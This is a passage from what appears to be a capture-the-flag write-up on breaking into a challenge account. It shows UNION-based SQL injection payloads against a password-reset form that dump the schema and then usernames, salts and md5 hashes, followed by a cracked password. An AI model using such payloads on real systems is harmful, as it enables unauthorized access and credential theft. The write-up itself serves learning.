“service, to communicate with his associates. Let’s see if you can hack your way in his account… Hint: his password’s md5 is computed as followed:
md5 = md5($password + $salt)and Collins Hackle has a password which can be found in an english dictionary”
There was a simple login form in the web page so, obviously, the usual login form routine tests were run against it.
After a couple of tries I followed the “Lost password?” link and there was another form that seemed a lot like the regular one we get in these kind of links. Running some tests on it I got an error message printed on the screen:
The most logical thing to do in a SQLi attack is to try dumping the number of columns using the union operator.
Knowing that there was only one column, I tried to dump the table’s data: ' union select concat(table_name,":",column_name) from information_schema.columns#
After taking a look at the end of the dumped info I found what I needed.
Having the table’s columns full names it was easy to dump the content.
Using the following payload I could dump all the users table columns’ contents: ' union select concat(userID,":",username,":",pass_salt,":",pass_md5) from users#
Ok we have the dump but the passwords were hashed and salted
At this point I wrote my own brute force script:
Some seconds later the password was found:
pizza is the user password we needed :).
Then I logged in with the c.hackle:pizza credentials:
